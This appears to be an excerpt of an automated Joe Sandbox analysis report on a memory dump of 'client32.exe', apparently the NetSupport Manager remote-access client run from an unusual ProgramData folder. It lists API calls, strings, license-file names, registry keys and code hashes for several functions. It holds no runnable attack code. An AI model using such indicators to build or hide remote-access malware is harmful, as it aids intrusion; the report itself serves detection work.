Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: 665d8c3d3e5a309996a0c9cb7c62d94cab1811040e29cd6d311ca715e91f1e75
Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
Opcode Fuzzy Hash: 665d8c3d3e5a309996a0c9cb7c62d94cab1811040e29cd6d311ca715e91f1e75
Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91

Function 11089D80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(00000000,00000000,?,Function_00088E20), ref: 11089E66
MessageBoxIndirectA.USER32(00000028), ref: 11089E72
KillTimer.USER32(00000000,00000000), ref: 11089E7D
PeekMessageA.USER32(?,00000000,00000012,00000012,00000001), ref: 11089E8F

Strings

EH NOFAIL msg=%s, xrefs: 11089D99
(, xrefs: 11089E34

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageTimer$IndirectKillPeek
String ID: ($EH NOFAIL msg=%s
API String ID: 191993809-813564207
Opcode ID: b3063c7674f81f80569ec3d660920a9e12263c49249f1d76b5b24f4f6a278ef0
Instruction ID: cbc7bdc96bb29d1dc89af180d8cc6f49946759862dc78122d9ea7e19cf337884
Opcode Fuzzy Hash: b3063c7674f81f80569ec3d660920a9e12263c49249f1d76b5b24f4f6a278ef0
Instruction Fuzzy Hash: B2415E75E442199FDB10DFA9D980BDEBBF4EF88714F14412AF919E7240EB719901CBA0

Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

IsJPIK.PCICHEK(B6DE5DE1,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

IKS, xrefs: 1102A787
_License, xrefs: 1102A778
Serial_no, xrefs: 1102A773
iks.lic, xrefs: 1102A740
NSM.LIC, xrefs: 1102A6E4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free_malloc_memsetwsprintf
String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
API String ID: 2814900446-469156069
Opcode ID: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
Opcode Fuzzy Hash: ff4ac407b235261cef4c9b00f394b765939f025b8093691e2c366861de4ad91e
Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791

Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1

Strings

..\ctl32\Refcount.cpp, xrefs: 1111008B
hThread, xrefs: 11110090

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0

Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
GetStockObject.GDI32(00000004), ref: 111036DB
RegisterClassA.USER32(?), ref: 111036EF
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C

Strings

NSMDesktopWnd, xrefs: 11103669, 111036E8, 11103726

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94

Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
RegCloseKey.ADVAPI32(?), ref: 11145FD4

Strings

SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11145F37, 11145F6E
SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11145F50
ForceRTL, xrefs: 11145F93

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3

Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9

GetComputerNameA.KERNEL32(?,?), ref: 11112288

Strings

\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 11112230
, xrefs: 11112281
ACM, xrefs: 11112242
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 11112297

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390

Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\o2xqxqs\client32.exe,00000104,?,11144A43,?), ref: 11144819

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
ResetEvent.KERNEL32(00000270), ref: 11144E39
SetEvent.KERNEL32(00000270), ref: 11144E4F
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E

Strings

MiniDump, xrefs: 11144DD7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1

Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 111101C9

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

wsprintfA.USER32 ref: 111101E4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

_memset.LIBCMT ref: 11110207

Strings

..\ctl32\Refcount.cpp, xrefs: 111101F5
Can't alloc %u bytes, xrefs: 111101DE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5

Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

wsprintfA.USER32 ref: 1114650E
wsprintfA.USER32 ref: 11146524

Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF

Strings

%sNSA.LIC, xrefs: 1114651E
%sNSM.LIC, xrefs: 11146508
NSM.LIC, xrefs: 111464F3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 53043ca0b2199545549f4f7586d1ff877437be16c725c5060925ba8c7e2e3731
Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
Opcode Fuzzy Hash: 53043ca0b2199545549f4f7586d1ff877437be16c725c5060925ba8c7e2e3731
Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1

Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 110F4B8A
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
TranslateMessage.USER32(?), ref: 110F4BC4
DispatchMessageA.USER32(?), ref: 110F4BCA
CoUninitialize.OLE32 ref: 110F4BE6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchInitializeTranslateUninitialize
String ID:
API String ID: 3550192930-0
Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61

Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
CloseHandle.KERNEL32(00000000), ref: 11143EBF

Strings

", xrefs: 11143E4E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
